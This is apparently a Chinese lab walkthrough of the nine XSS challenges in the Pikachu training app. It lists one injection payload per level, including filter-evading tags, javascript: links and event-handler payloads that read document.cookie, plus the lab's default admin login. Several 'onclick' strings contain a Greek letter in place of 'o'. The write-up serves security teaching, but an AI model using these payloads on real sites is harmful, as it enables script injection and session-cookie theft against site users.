文章目录
前言
本文基于的是pikachu中的XSS闯关,在这篇文章里介绍了一共九种XSS的闯关细节和代码,希望对读者理解XSS漏洞有一定的了解。
闯关流程
一、反射型XSS(get)
代码:<script>alert('xss')</script>
二、存储型XSS
代码:<script>alert('xss')</script>
三、DOM型XSS
代码:' οnclick="alert('xss')">
代码:' οnclick="alert(document.cookie)">
四、DOM型XSS-x
代码:#' οnclick="alert(document.cookie)">
五、XSS之盲打
首先在第一个对话框里输入的代码如下
<script>alert('xss')</script>
在URL中输入192.168.182.30/pikachu/pikachu-master/vul/xss/xssblind/admin_login.php
用户名为admin,密码为123456
结果图如下
六、XSS之过滤
代码:<SCript>alert('xss')</ScriPt>
结果图为
七、XSS之htmlspecialchars
代码:q' οnclick='alert("xss")'
结果图为
八、XSS之href输出
代码:javascript:alert('xss')
九、XSS之js输出
代码:</script><script>alert('xss')</script>
总结
笔者写这些实属不易,希望能得到读者认可的同时,最重要还是希望读者能有所收获......